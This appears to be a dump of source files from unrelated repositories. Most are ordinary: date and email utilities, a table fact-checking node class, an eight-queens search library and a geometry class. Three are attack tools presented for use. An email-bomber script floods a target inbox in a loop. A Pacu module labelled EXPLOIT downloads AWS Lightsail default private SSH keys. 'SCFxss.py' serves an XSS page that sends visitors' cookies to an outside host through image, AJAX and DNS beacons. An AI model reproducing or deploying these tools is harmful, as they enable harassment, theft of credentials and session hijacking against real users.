    return 'hsl(%d, %d%%, %d%%)' % (hue, saturation, lightness)


def format_date(date, detailed=False):
    # behaviour of this function must be consistent with the front-end
    if detailed:
        return date.isoformat(' ')
    delta = int(round((datetime.datetime.now() - date).total_seconds()))
    if delta < 60:
        return _('just now')
    elif delta < 3600:
        minutes = delta // 60
        if minutes == 1:
            return _('a minute ago')
        else:
            return _('%d minutes ago') % minutes
    elif delta < 86400:
        hours = delta // 3600
        if hours == 1:
            return _('an hour ago')
        else:
            return _('%d hours ago') % hours
    # 604800 = 86400*7
    elif delta < 604800:
        days = delta // 86400
        if days == 1:
            return _('a day ago')
        else:
            return _('%d days ago') % days
    # 2629746 = 86400*(31+28+97/400+31+30+31+30+31+31+30+31+30+31)/12
    elif delta < 2629746:
        weeks = delta // 604800
        if weeks == 1:
            return _('a week ago')
        else:
            return _('%d weeks ago') % weeks
    # 31556952 = 86400*(365+97/400)
    elif delta < 31556952:
        months = delta // 2629746
        if months == 1:
            return _('a month ago')
        else:
            return _('%d months ago') % months
    else:
        years = delta // 31556952
        if years == 1:
            return _('a year ago')
        else:
            return _('%d years ago') % years


class EmailThread(threading.Thread):
    def __init__(self, subject, addr_from, addr_to, content, html=''):
        if(html):
            msg = MIMEMultipart('alternative')
            msg_plaintext = MIMEText(content, 'plain')
            msg_html = MIMEText(html, 'html')
            msg.attach(msg_html)
            msg.attach(msg_plaintext)
        else:
            msg = MIMEText(content, 'plain')
        msg['Subject'] = subject
        msg['From'] = addr_from
        msg['To'] = addr_to
        self.msg = msg
        threading.Thread.__init__(self)

    def run(self):
        smtp = smtplib.SMTP('localhost')
        smtp.send_message(self.msg)
        smtp.quit()


def send_mail(subject, addr_from, addr_to, content, html=''):
    EmailThread(subject, addr_from, addr_to, content, html).start()


class AESCipher(object):
    # http://stackoverflow.com/questions/12524994
    def __init__(self, key):
        self.bs = 32
        self.key = hashlib.sha256(key.encode(encoding='utf8')).digest()

    def encrypt(self, raw):
        raw = self._pad(quote(raw))
        iv = Random.new().read(AES.block_size)
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return base64.b64encode(iv + cipher.encrypt(raw))

    def decrypt(self, enc):
        enc = base64.b64decode(enc)
        iv = enc[:AES.block_size]
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return unquote(self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8'))

    def _pad(self, s):
        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)

    @staticmethod
    def _unpad(s):
        return s[:-ord(s[len(s)-1:])]
```
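A quick sanity check of `format_date`, which the templates rely on for relative timestamps (this assumes the module imports cleanly, i.e. the gettext `translations` directory for `LOCALE` exists, since the translation object is loaded at import time):

```python
import datetime
from utils import format_date

three_hours_ago = datetime.datetime.now() - datetime.timedelta(hours=3)
print(format_date(three_hours_ago))                 # -> '3 hours ago' (localized)
print(format_date(three_hours_ago, detailed=True))  # -> full ISO timestamp
```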
{ "source": "911Steven/Table-Fact-Checking", "score": 3 }
#### File: Table-Fact-Checking/code/Node.py
```python
import pandas
import numpy
import copy
from APIs import APIs


class Node(object):
    def __init__(self, rows, memory_str, memory_num, header_str, header_num,
                 must_have, must_not_have):
        # For intermediate results
        self.memory_str = memory_str
        self.memory_num = memory_num
        self.memory_bool = []
        self.header_str = header_str
        self.header_num = header_num
        self.trace_str = [v for k, v in memory_str]
        self.trace_num = [v for k, v in memory_num]
        # For intermediate data frame
        self.rows = [("all_rows", rows)]
        self.cur_str = ""
        self.cur_strs = []
        self.cur_funcs = []
        self.must_have = must_have
        self.must_not_have = must_not_have
        self.row_counter = [1]
        #self.str_counter = [0] * len(memory_str)
        #self.num_counter = [0] * len(memory_num)

    def done(self):
        if self.memory_str_len == 0 and self.memory_num_len == 0 and \
                self.memory_bool_len == 0 and all([_ > 0 for _ in self.row_counter]):
            for funcs in self.must_have:
                if any([f in self.cur_funcs for f in funcs]):
                    continue
                else:
                    return False
            return True
        else:
            return False

    @property
    def tostring(self):
        print "memory_str:", self.memory_str
        print "memory_num:", self.memory_num
        print "header_str:", self.header_str
        print "header_num:", self.header_num
        print "trace:", self.cur_str

    def concat(self, new_str, k):
        """
        if APIs[k]['append']:
            if self.cur_str:
                self.cur_str += ";" + new_str
            else:
                self.cur_str = new_str
        else:
            pass
        """
        func = new_str.split('(')[0]
        self.cur_funcs.append(func)
        self.cur_strs.append(new_str)
        #if func == 'max':
        #    self.must_not_have.extend(['max', 'argmax'])
        #if func == 'min':
        #    self.must_not_have.extend(['min', 'argmin'])

    def exist(self, command):
        return command in self.cur_strs

    def clone(self, command, k):
        tmp = copy.deepcopy(self)
        tmp.concat(command, k)
        return tmp

    @property
    def memory_str_len(self):
        return len(self.memory_str)

    @property
    def memory_num_len(self):
        return len(self.memory_num)

    @property
    def tmp_memory_num_len(self):
        return len([_ for _ in self.memory_num if "tmp_" in _ and _ != "tmp_none"])
        #return len(self.memory_num)

    @property
    def tmp_memory_str_len(self):
        return len([_ for _ in self.memory_str if "tmp_" in _])

    @property
    def memory_bool_len(self):
        return len(self.memory_bool)

    @property
    def row_num(self):
        return len(self.rows) - 1

    @property
    def hash(self):
        return hash(frozenset(self.cur_strs))
        """
        cache_hash = hash(tuple(self.memory_str + self.memory_num + self.memory_bool \
                                + self.header_str + self.header_num))
        if self.row_num:
            r = []
            for row in self.rows[1:]:
                r.append(len(row))
                r.append(row.iloc[0][0])
            row_hash = hash(tuple(r))
            return cache_hash + row_hash
        else:
            return cache_hash
        """

    def append_result(self, command, r):
        self.cur_str = "{}={}".format(command, r)

    def append_bool(self, r):
        if self.cur_str != "":
            self.cur_str += ";{}".format(r)
        else:
            self.cur_str = "{}".format(r)

    def get_memory_str(self, i):
        return self.memory_str[i][1]

    def get_memory_num(self, i):
        return self.memory_num[i][1]

    def add_memory_num(self, header, val, command):
        if isinstance(val, int) or isinstance(val, float):
            if type(val) == type(1) or type(val) == type(1.2):
                self.memory_num.append((header, val))
            else:
                self.memory_num.append((header, numpy.asscalar(val)))
            self.trace_num.append(command)
        else:
            raise ValueError("type error")

    def add_memory_bool(self, header, val):
        if isinstance(val, bool):
            self.memory_bool.append((header, val))
        else:
            raise ValueError("type error")

    def add_memory_str(self, header, val, command):
        if isinstance(val, unicode) or isinstance(val, str):
            self.memory_str.append((header, val))
            self.trace_str.append(command)
        else:
            raise ValueError("type error")

    def add_header_str(self, header):
        self.header_str.append(header)

    def add_header_num(self, header):
        self.header_num.append(header)

    def add_rows(self, header, val):
        if isinstance(val, pandas.DataFrame):
            #for row_h, row in self.rows:
            #    if len(row) == len(val) and row.iloc[0][0] == val.iloc[0][0]:
            #        return
            if any([row_h == header for row_h, row in self.rows]):
                return
            self.rows.append((header, val.reset_index(drop=True)))
            self.row_counter.append(0)
        else:
            raise ValueError("type error")

    def inc_row_counter(self, i):
        self.row_counter[i] += 1

    def delete_memory_num(self, *args):
        for i, arg in enumerate(args):
            del self.memory_num[arg - i]
            del self.trace_num[arg - i]

    def delete_memory_str(self, *args):
        for i, arg in enumerate(args):
            del self.memory_str[arg - i]
            del self.trace_str[arg - i]

    def delete_memory_bool(self, *args):
        for i, arg in enumerate(args):
            del self.memory_bool[arg - i]

    #def delete_header_num(self, i):
    #    del self.header_num[i]

    #def delete_header_str(self, i):
    #    del self.header_str[i]

    def check(self, *args):
        #print args
        final = {}
        for arg in args:
            if arg == 'row':
                continue
            if arg == ['header_str', 'string']:
                if any([k is not None for k, v in self.memory_str]):
                    continue
                else:
                    return False
            if arg == ['header_num', 'number']:
                if any([k is not None for k, v in self.memory_num]):
                    continue
                else:
                    return False
            if arg == 'string':
                if len(self.memory_str) > 0:
                    continue
                else:
                    return False
            if arg == 'number':
                if len(self.memory_num) > 0:
                    continue
                else:
                    return False
            if arg == 'header_str':
                if len(self.header_str) > 0:
                    continue
                else:
                    return False
            if arg == 'header_num':
                if len(self.header_num) > 0:
                    continue
                else:
                    return False
        return True
```
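A hypothetical construction sketch for `Node` (Python 2, matching the module): the table snapshot goes in as `rows`, while the string/number memories hold `(header, value)` pairs collected so far. The concrete values below are made up for illustration only:

```python
import pandas

table = pandas.DataFrame({'team': ['a', 'b'], 'score': [1, 2]})
node = Node(rows=table,
            memory_str=[('team', 'a')],   # (header, value) string memory
            memory_num=[('score', 1)],    # (header, value) numeric memory
            header_str=['team'], header_num=['score'],
            must_have=[['max']], must_not_have=[])
print node.memory_str_len, node.row_num   # -> 1 0
```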
{ "source": "911whatsyouremergency/email-bomber", "score": 3 }
#### File: 911whatsyouremergency/email-bomber/main.py ```python import configparser import smtplib import keyboard import threading from rich import print from email.mime.text import MIMEText def invert_event(key_event): if start_event.is_set(): start_event.clear() else: start_event.set() # S listening def listen_S(): keyboard.on_release_key(key='S', callback=invert_event) # main while True: try: print(""" 1 - Bomb an [cyan]email[/cyan] 2 - Change [cyan]email service[/cyan] """) choice = int(input(">>> ")) except ValueError: print("[bold red]Please, type number.") else: if choice == 1: # taking information from config.ini config = configparser.ConfigParser() config.read("config.ini") sender_email = config["Email"]["email"] sender_password = config["Email"]["password"] sender_host = config["Email"]["host"] sender_port = config["Email"]["port"] # taking other information by input target_email = input("Email of your target?: ") text = input("Text?: ") # connecting to SMTP print("\n[yellow]Trying to connect via a secure connection...", end=" ") smtpObj = smtplib.SMTP(sender_host, sender_port) smtpObj.starttls() print("[bold green]success!\n") # waiting for pushing button print("[bold yellow]Waiting for pushing 'S' button...\n") start_event = threading.Event() threading.Thread(target=listen_S).run() start_event.wait() total_emails = 0 # boom boom while start_event.is_set(): try: print("[yellow]Trying to send an email...", end=" ") smtpObj.login(sender_email, sender_password) smtpObj.sendmail(sender_email, target_email, text) print("[bold green]success!") total_emails += 1 # errors except smtplib.SMTPAuthenticationError: print("[bold red]wrong email or password (or you forget about turning on less secure apps in your google account)! [ERROR]") break except smtplib.SMTPRecipientsRefused: print("[bold red]invalid resiever's email [ERROR]") break except UnicodeError: msg = MIMEText(text, 'plain', 'utf-8') smtpObj.sendmail( sender_email, target_email, msg.as_string()) print("success!") except: print(f"[bold red]some error occured [ERROR]") break # while button 'S' pushed in 2 time print(f"\n[bold red]Stopped by user. {total_emails} emails currently sent.") # changing the email service elif choice == 2: print("1 - [cyan]Gmail[/cyan] (default)\n2 - [cyan]Mail.ru[/cyan]\n3 - [cyan]Yahoo![/cyan]\n4 - [cyan]AOL[/cyan]\n5 - [red]Back[/red]\n") while True: try: service = int(input(">>> ")) except ValueError: print("[bold red]Please, type number.") else: if service == 1: host = "smtp.gmail.com" port = "587" all_ok = True elif service == 2: host = "smtp.mail.ru" port = "465" all_ok = True elif service == 3: host = "smtp.mail.yahoo.com" port = "465" all_ok = True elif service == 4: host = "smtp.aol.com" port = "587" all_ok = True elif service == 5: print("[bold red]Aborting...") break else: print("[bold red]Type 1 or 2 only!") all_ok = False if all_ok: # writing email service into the config.ini config = configparser.ConfigParser() config.read('config.ini') config['Email']['host'] = host config['Email']['port'] = port with open('config.ini', 'w') as configfile: config.write(configfile) print("[bold green]Success!") else: print("[bold red]Type 1, 2 or 3 only!") ```
{ "source": "91299792458/pacu", "score": 3 }
#### File: modules/lightsail__download_ssh_keys/main.py
```python
import argparse
from pathlib import Path

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'lightsail__download_ssh_keys',

    # Name and any other notes about the author
    'author': '<NAME> of Rhino Security Labs',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'EXPLOIT',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Downloads Lightsails default SSH key pairs.',

    # Description about what the module does and how it works
    'description': 'This module downloads the accounts default public and private SSH keys for AWS Lightsail.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['Lightsail'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])


def main(args, pacu_main):
    ###### Don't modify these. They can be removed if you are not using the function.
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    summary_data = {'region_key_pairs': []}

    regions = get_regions('lightsail')

    dl_path = Path.cwd() / 'sessions' / session.name / 'downloads' / 'download_lightsail_ssh_keys'
    if not dl_path.exists():
        dl_path.mkdir()
    summary_data['dl_path'] = str(dl_path.relative_to(Path.cwd() / 'sessions' / session.name))

    for region in regions:
        print('  Downloading default keys for {}...'.format(region))
        cur_path = dl_path / region
        if not cur_path.exists():
            cur_path.mkdir()
        client = pacu_main.get_boto3_client('lightsail', region)
        downloaded_keys = client.download_default_key_pair()
        restructured_keys = {
            'publicKey': downloaded_keys['publicKeyBase64'],
            'privateKey': downloaded_keys['privateKeyBase64']
        }

        private_path = cur_path / 'default'
        with private_path.open('w', encoding='utf-8') as key_file:
            key_file.write(restructured_keys['privateKey'])
        public_path = cur_path / 'default.pub'
        with public_path.open('w', encoding='utf-8') as key_file:
            key_file.write(restructured_keys['publicKey'])

        summary_data['region_key_pairs'].append(region)

    print('\n{} completed.\n'.format(module_info['name']))
    return summary_data


def summary(data, pacu_main):
    out = '  Keys downloaded to:\n'
    out += '    ' + data['dl_path'] + '\n'
    out += '  Downloaded Key Pairs for the following regions: \n'
    for region in sorted(data['region_key_pairs']):
        out += '    {}\n'.format(region)
    return out
```
{ "source": "913360158/githubdemo", "score": 2 }
#### File: githubdemo/handler/handlerdb.py
```python
debian = {
    "project": "successful :model is running"
}


def produce(action_name):
    global debian
    try:
        # dict.get() never raises KeyError, so index directly
        # to make the fallback branch below actually reachable
        handler = debian[action_name]
    except KeyError as e:
        print(str(e))
        handler = "NotFindModel"
    return handler
```
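With the direct lookup above, a known action returns its message and an unknown one falls through to the `KeyError` branch:

```python
print(produce("project"))  # -> 'successful :model is running'
print(produce("missing"))  # prints the KeyError, then -> 'NotFindModel'
```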
{ "source": "913982779/eight_queens", "score": 2 }
#### File: eight_queens/mylib/queens_lib.py
```python
# \file queens_lib.py
# \brief Algorithm library for the eight queens problem
# \author 1851738杨皓冬
# \version 6.0
# \date 2020-11-06
#
# -----------------------------------------------------------------------------
#
# -----------------------------------------------------------------------------
# Revision history:
# <date>       | <version> | <author>       |
# 2020-10-31   | v1.0      | 1851738杨皓冬  |
# 2020-11-01   | v2.0      | 1851738杨皓冬  |
# 2020-11-03   | v3.0      | 1851738杨皓冬  |
# 2020-11-04   | v4.0      | 1851738杨皓冬  |
# 2020-11-05   | v5.0      | 1851738杨皓冬  |
# 2020-11-06   | v6.0      | 1851738杨皓冬  |
# -----------------------------------------------------------------------------
# ******************************************************************************/
from collections import Counter
import random
import math

#----------------------------------------------------------------------------#
class Queens:
    queens = 0
    col_axis = []
    row_axis = []
    h_value = 0          # heuristic function value
    loc_opt_flag = 0     # local-optimum flag: flag=1 with h_value>0 means the search is stuck in a local optimum
    K = 0                # K value for local beam search
    G = 0                # population size of the genetic algorithm
    lb_init_dict = None  # initial K states for local beam search
    ga_init_dict = None  # initial G states for the genetic algorithm
    mutation_rate = 0.1  # mutation probability of the genetic algorithm

    #------------------- simulated annealing parameters --------------------#
    T_n = 0         # current annealing temperature
    T_MAX = 10000   # upper temperature limit
    T_lamda = 0.85  # temperature decay factor per iteration
    #------------------------------------------------------------------------#

    # @brief: constructor
    # @param[in]: queens -> number of queens in the problem
    # @retval: None
    def __init__(self, queens):
        self.queens = queens
        self.col_axis = [i for i in range(1, queens+1)]
        self.row_axis = [random.randint(1, queens) for _ in range(queens)]
        self.h_value = self.__h_x(self.row_axis, self.col_axis)
        self.T_n = self.T_MAX  # initial annealing temperature
        self.K = 8             # preset K for local beam search, adjustable
        self.G = 14            # preset G for the genetic algorithm, adjustable but must be even
        self.lb_init_dict = self.__random_explor_k(self.row_axis, self.col_axis, self.K)
        self.ga_init_dict = self.__random_explor_k(self.row_axis, self.col_axis, self.G)

    #------------------- private helper functions --------------------------#
    # @brief: merge two dictionaries
    # @param[in]: dic1, dic2
    # @retval: dic_new -> the merged dictionary
    # @attention: dic2 overwrites entries of dic1 with the same key,
    #             which does not affect solving this problem
    def __dic_sum(self, dic1, dic2):
        return {**dic1, **dic2}

    # @brief: forward slice of a dictionary, taking end-start items in total
    # @param[in]: dic, start, end
    # @retval: dic_new -> the sliced dictionary
    def __dic_cut(self, dict, start, end):
        temp = list(dict.keys())[start:end]
        dic_new = {}
        for i in range(len(temp)):
            dic_new[temp[i]] = dict.get(temp[i])
        return dic_new

    # @brief: compute the number of combinations
    # @param[in]: m, n -> combination factors
    # @retval: the number of combinations
    def __C(self, m, n):
        if((m > n) | (m < 0) | (n < 0)):
            return 0
        else:
            return (self.__factorial(n)/(self.__factorial(m)*self.__factorial(n-m)))

    # @brief: compute a factorial
    # @param[in]: number -> the value
    # @retval: the factorial of number
    def __factorial(self, number):
        if number <= 1:
            return 1
        else:
            return number*self.__factorial(number-1)

    # @brief: compute the diagonal coordinate systems from Cartesian coordinates
    # @param[in]: row_list -> row coordinates, col_list -> column coordinates
    # @retval: lt2rb_list -> diagonal coordinates from top-left to bottom-right,
    #          rt2lb_list -> diagonal coordinates from top-right to bottom-left
    def __cal_inclined_coordinate(self, row_list, col_list):
        lt2rb_list = []
        rt2lb_list = []
        for i in range(len(row_list)):
            lt2rb_list = lt2rb_list+[col_list[i]+row_list[i]-1]
            rt2lb_list = rt2lb_list+[len(row_list)+row_list[i]-col_list[i]]
        return lt2rb_list, rt2lb_list

    # @brief: from the current state, randomly explore one node no worse than the current one
    # @param[in]: row_list -> row coordinates, col_list -> column coordinates
    # @retval: new_row_list -> new row coordinates, new_h_value -> new heuristic value
    def __random_explor_opt(self, row_list, col_list):
        h_value = self.__h_x(row_list, col_list)
        new_row_list = row_list.copy()
        while(1):
            i = random.randint(0, len(row_list)-1)
            j = new_row_list[i]
            new_row_list[i] = random.randint(1, len(row_list))
            new_h_value = self.__h_x(new_row_list, col_list)
            if(new_h_value <= h_value):
                break
            else:
                new_row_list[i] = j  # restore the state
        return new_row_list, new_h_value

    # @brief: from the current state, randomly explore k neighbor nodes and return
    #         them together with their heuristic values as a dictionary
    # @param[in]: row_list -> row coordinates, col_list -> column coordinates,
    #             k -> number of nodes to explore
    # @retval: k_node_dic
    def __random_explor_k(self, row_list, col_list, k):
        k_node_dic = {}
        while(1):
            i = random.randint(0, self.queens-1)
            j = row_list[i]
            row_list[i] = random.randint(1, self.queens)
            k_node_dic[tuple(row_list)] = self.__h_x(row_list, self.col_axis)
            if(len(k_node_dic) == k):
                break
            row_list[i] = j
        return k_node_dic

    # @brief: compute the heuristic value (number of attacking pairs) from the coordinates
    # @param[in]: row_list -> row coordinates, col_list -> column coordinates
    # @retval: h_value -> heuristic value of the current coordinates
    def __h_x(self, row_list, col_list):
        temp_value = 0
        lt2rb_list, rt2lb_list = self.__cal_inclined_coordinate(row_list, col_list)
        count_dic_row = dict(Counter(row_list))
        count_dic_lt2rb, count_dic_rt2lb = dict(Counter(lt2rb_list)), dict(Counter(rt2lb_list))
        for value in count_dic_row.values():
            temp_value = temp_value+self.__C(2, value)
        for value in count_dic_lt2rb.values():
            temp_value = temp_value+self.__C(2, value)
        for value in count_dic_rt2lb.values():
            temp_value = temp_value+self.__C(2, value)
        return int(temp_value)

    # @brief: transition probability function of stochastic beam search
    # @param[in]: h_value
    # @retval: bool -> 1 accepts the move to the new state, 0 rejects it
    def __random_beam_trans(self, h_value):
        trans_p = 2**(-h_value)
        p = random.random()
        if(p <= trans_p):
            return 1
        else:
            return 0

    # @brief: transition probability function of simulated annealing
    # @param[in]: T_current -> current temperature,
    #             old_h_value -> energy before the move, new_h_value -> energy after the move
    # @retval: bool -> 1 accepts the move to the new state, 0 rejects it
    def __simu_anneal_trans(self, T_current, old_h_value, new_h_value):
        if(new_h_value <= old_h_value):
            return 1
        else:
            delta = new_h_value - old_h_value
            p_trans = math.exp(-delta/T_current)  # annealing acceptance probability
            p = random.random()
            if(p <= p_trans):
                return 1
            else:
                return 0

    # @brief: natural selection function of the genetic algorithm
    # @param[in]: population
    # @retval: selected_population -> the population after natural selection
    def __ga_selection(self, population):
        select_rate = list(population.values())
        for i in range(len(select_rate)):
            select_rate[i] = 2**(-select_rate[i])
        selected_population = {}
        while(1):
            j = random.randint(0, len(select_rate)-1)
            p = random.random()
            if(p <= select_rate[j]):
                selected_population[list(population.keys())[j]] = list(population.values())[j]
            if(len(selected_population) == self.G):
                break
        return selected_population

    # @brief: crossover function of the genetic algorithm
    # @param[in]: selected_population -> the population after natural selection
    # @retval: crossover_population -> the population after crossover
    def __ga_crossover(self, selected_population):
        crossover_population = {}
        while(1):
            #----------------- pick the parents at random -------------------#
            i = random.randint(1, len(selected_population)-1)
            father = list(list(selected_population.keys())[i])
            mother = list(list(selected_population.keys())[i-1])
            #-----------------------------------------------------------------#
            #----------------- random crossover begins -----------------------#
            j = random.randint(0, self.queens-1)
            son_1 = mother[0:j+1] + father[j+1:self.queens]
            son_2 = father[0:j+1] + mother[j+1:self.queens]
            h_son_1 = self.__h_x(son_1, self.col_axis)
            h_son_2 = self.__h_x(son_2, self.col_axis)
            #----------------- random crossover ends -------------------------#
            crossover_population[tuple(son_1)] = h_son_1
            if(len(crossover_population) == self.G):
                break
            crossover_population[tuple(son_2)] = h_son_2
            if(len(crossover_population) == self.G):
                break
        return crossover_population

    # @brief: mutation function of the genetic algorithm
    # @param[in]: crossover_population -> the population after crossover
    # @retval: mutation_population -> the population after random mutation
    def __ga_mutation(self, crossover_population):
        mutation_population = {}
        while(1):
            for i in range(len(crossover_population)):
                p = random.random()
                # a mutation occurs
                if(p <= self.mutation_rate):
                    j = random.randint(0, self.queens-1)
                    temp_row_list = list(list(crossover_population.keys())[i])
                    temp_row_list[j] = random.randint(1, self.queens)
                    mutation_population[tuple(temp_row_list)] = self.__h_x(temp_row_list, self.col_axis)
                else:
                    mutation_population[list(crossover_population.keys())[i]] = list(crossover_population.values())[i]
                if(len(mutation_population) == self.G):
                    break
                else:
                    continue
            break
        return mutation_population
    #------------------------------------------------------------------------#

    #------------------- public algorithm-level methods --------------------#
    # @brief: greedy hill climbing
    # @attention: each step expands the best point in the whole neighborhood
    # @param[in]: None
    # @retval: None
    def hill_climbing(self):
        best_row_list = self.row_axis.copy()
        for i in range(self.queens):
            temp_row_list = self.row_axis.copy()
            for j in range(self.queens):
                temp_row_list[i] = self.col_axis[j]
                temp_h_value = self.__h_x(temp_row_list, self.col_axis)
                if(temp_h_value < self.h_value):
                    self.h_value = temp_h_value
                    best_row_list = temp_row_list.copy()
        self.row_axis = best_row_list

    # @brief: first-choice hill climbing
    # @attention: randomly probes the neighborhood and expands as soon as a point
    #             no worse than the current one is found, until the optimum
    # @param[in]: None
    # @retval: None
    def first_hill_climbing(self):
        best_row_list = self.row_axis.copy()
        self.row_axis, self.h_value = self.__random_explor_opt(best_row_list, self.col_axis)

    # @brief: random-restart hill climbing
    # @attention: restarts at random as soon as greedy hill climbing
    #             gets stuck in a local optimum
    # @param[in]: None
    # @retval: None
    def random_rehill_climbing(self):
        self.loc_opt_flag = 1
        best_row_list = self.row_axis.copy()
        for i in range(self.queens):
            temp_row_list = self.row_axis.copy()
            for j in range(self.queens):
                temp_row_list[i] = self.col_axis[j]
                temp_h_value = self.__h_x(temp_row_list, self.col_axis)
                if(temp_h_value < self.h_value):
                    self.h_value = temp_h_value
                    best_row_list = temp_row_list.copy()
                    self.loc_opt_flag = 0  # any improvement at all means we are not in a local optimum
        if((self.loc_opt_flag == 1) & (self.h_value > 0)):
            # random restart
            self.row_axis = [random.randint(1, self.queens) for _ in range(self.queens)]
            self.h_value = self.__h_x(self.row_axis, self.col_axis)
        else:
            self.row_axis = best_row_list

    # @brief: local beam search
    # @param[in]: last_K_dic -> dictionary of the previous K states
    # @retval: new_K_dic -> dictionary of the new K states
    def local_beam(self, last_K_dic):
        new_K_dic = {}
        for key in last_K_dic:
            temp_dic = self.__random_explor_k(list(key), self.col_axis, self.K)
            new_K_dic = self.__dic_sum(new_K_dic, temp_dic)
        new_K_dic = dict(sorted(new_K_dic.items(), key=lambda kv: kv[1]))
        new_K_dic = self.__dic_cut(new_K_dic, 0, self.K)
        self.row_axis = list(list(new_K_dic.keys())[0])
        self.h_value = list(new_K_dic.values())[0]
        return new_K_dic

    # @brief: stochastic beam search
    # @param[in]: last_K_dic -> dictionary of the previous K states
    # @retval: new_K_dic -> dictionary of the new K states
    def random_beam(self, last_K_dic):
        temp_K_dic, new_K_dic = {}, {}
        for key in last_K_dic:
            temp_dic = self.__random_explor_k(list(key), self.col_axis, self.K)
            temp_K_dic = self.__dic_sum(temp_K_dic, temp_dic)
        while(1):
            random_index = random.randint(0, len(temp_K_dic)-1)
            temp_flag = self.__random_beam_trans(list(temp_K_dic.values())[random_index])
            if(temp_flag):
                new_K_dic[list(temp_K_dic.keys())[random_index]] = list(temp_K_dic.values())[random_index]
            else:
                continue
            if(len(new_K_dic) == self.K):
                break
        new_K_dic = dict(sorted(new_K_dic.items(), key=lambda kv: kv[1]))
        self.row_axis = list(list(new_K_dic.keys())[0])
        self.h_value = list(new_K_dic.values())[0]
        return new_K_dic

    # @brief: simulated annealing
    # @attention: accepts nodes worse than the current one with some probability,
    #             in order to escape local optima
    # @param[in]: None
    # @retval: None
    def simu_anneal(self):
        temp_row_list = self.row_axis.copy()
        i = random.randint(0, self.queens-1)
        temp_row_list[i] = random.randint(1, self.queens)
        temp_h_value = self.__h_x(temp_row_list, self.col_axis)
        flag = self.__simu_anneal_trans(self.T_n, self.h_value, temp_h_value)
        self.T_n = self.T_n*self.T_lamda
        if(flag):
            self.row_axis = temp_row_list
            self.h_value = temp_h_value
        else:
            return

    # @brief: genetic algorithm
    # @param[in]: last_G_dic -> dictionary of the previous generation
    # @retval: new_G_dic -> dictionary of the new generation
    def genetic_algorithm(self, last_G_dic):
        selected_population = self.__ga_selection(last_G_dic)
        crossover_population = self.__ga_crossover(selected_population)
        new_G_dic = self.__ga_mutation(crossover_population)
        new_G_dic = dict(sorted(new_G_dic.items(), key=lambda kv: kv[1]))
        self.row_axis = list(list(new_G_dic.keys())[0])
        self.h_value = list(new_G_dic.values())[0]
        return new_G_dic
#----------------------------------------------------------------------------#
```
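A typical driver just loops one of the public methods until the heuristic reaches zero (no attacking pairs). Random-restart hill climbing is a safe choice because it restarts whenever it detects a local optimum:

```python
board = Queens(8)
while board.h_value > 0:
    board.random_rehill_climbing()
print(board.row_axis)  # 1-based row of the queen in each column, e.g. [5, 3, 1, 7, 2, 8, 6, 4]
```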
{ "source": "914525753/XssToHost", "score": 2 }
#### File: 914525753/XssToHost/SCFxss.py ```python def main_handler(event, context): html = '<html><head><meta http-equiv="Access-Control-Allow-Origin" content="*"><script src=https://libs.baidu.com/jquery/2.1.4/jquery.min.js></script>' html += '<script async="async">function XssImg(){var src="http://EXAMPLE.COM/?cookie="+document.cookie;$("html").append("<div id=xss></div>");$("#xss").css("display","none");$("#xss").append("<Img/Src="+src+" />")}XssImg();$.ajax({type:"GET",dataType:"html",url:"http://EXAMPLE.COM",data:"cookie="+document.cookie,});</script></head>' html += '<img id="shadow" style="display:none;"></img><style/onload=\'function xss(){var cookie=(document.cookie)?document.cookie:"nocookie";var src="http://"+cookie+".EXAMPLE.COM/1.jpg"document.getElementById("shadow").setAttribute("src",src)}xss();\'></style>' html += "</html>" response={ "isBase64Encoded": False, "statusCode": 200, "headers": {'Content-Type': 'text/html;charset=utf8'}, "body": html } return response ```
{ "source": "91472/Class-in-Python.-Encapsulation.-Inheritance.-Polymorphism", "score": 3 }
#### File: 91472/Class-in-Python.-Encapsulation.-Inheritance.-Polymorphism/Ultra_lite_parental_class.py
```python
class Formulas_2D:  # definition of the Formulas_2D class
    '''
    Class documentation.
    The Formulas_2D class prints one example of each of the basic formulas of a
    plane geometric figure; an object of the class is a figure.
    To create a Formulas_2D object and print the formulas of its perimeter and
    area, pass a single argument -- the figure type -- and call the formula
    output method on the object: .formulas()
    The figure type (the type_figure argument) can be one of: quadrat (square),
    rectangle, parallelogram, rhombus, trapezoid, triangle, circle.
    '''
    def __init__(self, type_figure):  # built-in class method, initialization
        self.figure = type_figure     # argument: the figure type
        if self.figure not in ['circle', 'quadrat', 'rectangle', 'parallelogram',
                               'triangle', 'trapezoid', 'rhombus']:
            raise Exception('Invalid argument')  # if the condition is True, raise an exception explicitly

    def __str__(self):  # built-in class method: what to print when the object itself is passed for output
        return f'Figure {self.figure}'

    def formulas(self):  # class method: return the area and perimeter formulas of the figure
        dict_formul = {
            'quadrat': 'P = 4 * a, S = a * a, where a is the side length, P the perimeter, S the area',
            'rectangle': 'P = 2*(a+b), S = a * b, where a, b are the side lengths, P the perimeter, S the area',
            'parallelogram': 'P = 2*(a+b), S = a(b) * h, where a, b are the side lengths, h the height dropped onto that side, P the perimeter, S the area',
            'rhombus': 'P = 4 * a, S = a * h, where a is the side length, h the height dropped onto that side, P the perimeter, S the area',
            'trapezoid': 'P = a+b+c+d, S = h*(a+b)/2, where a, b are the base lengths, h the height, P the perimeter, S the area',
            'triangle': 'P = a+b+c, S = (a * h)/2, where a is the side length, h the height dropped onto that side, P the perimeter, S the area',
            'circle': 'P = 2*pi*R, S = pi * R^2, where R is the radius, P the circumference, S the area'
        }
        return dict_formul[self.figure]


# check where this code runs from: if True, it runs as a standalone script and
# everything below executes; if False, it is imported from the .py file as a
# module, fully or partially, through calls to its methods
if __name__ == '__main__':
    try:
        # code below may raise an exception:
        # help(Formulas_2D)  # show the help of the created class with its documentation
        figure = Formulas_2D('triangle')  # create an object of the class
        #figure.figure = 'quadrat'  # with encapsulation applied, these attributes would not be accessible from outside
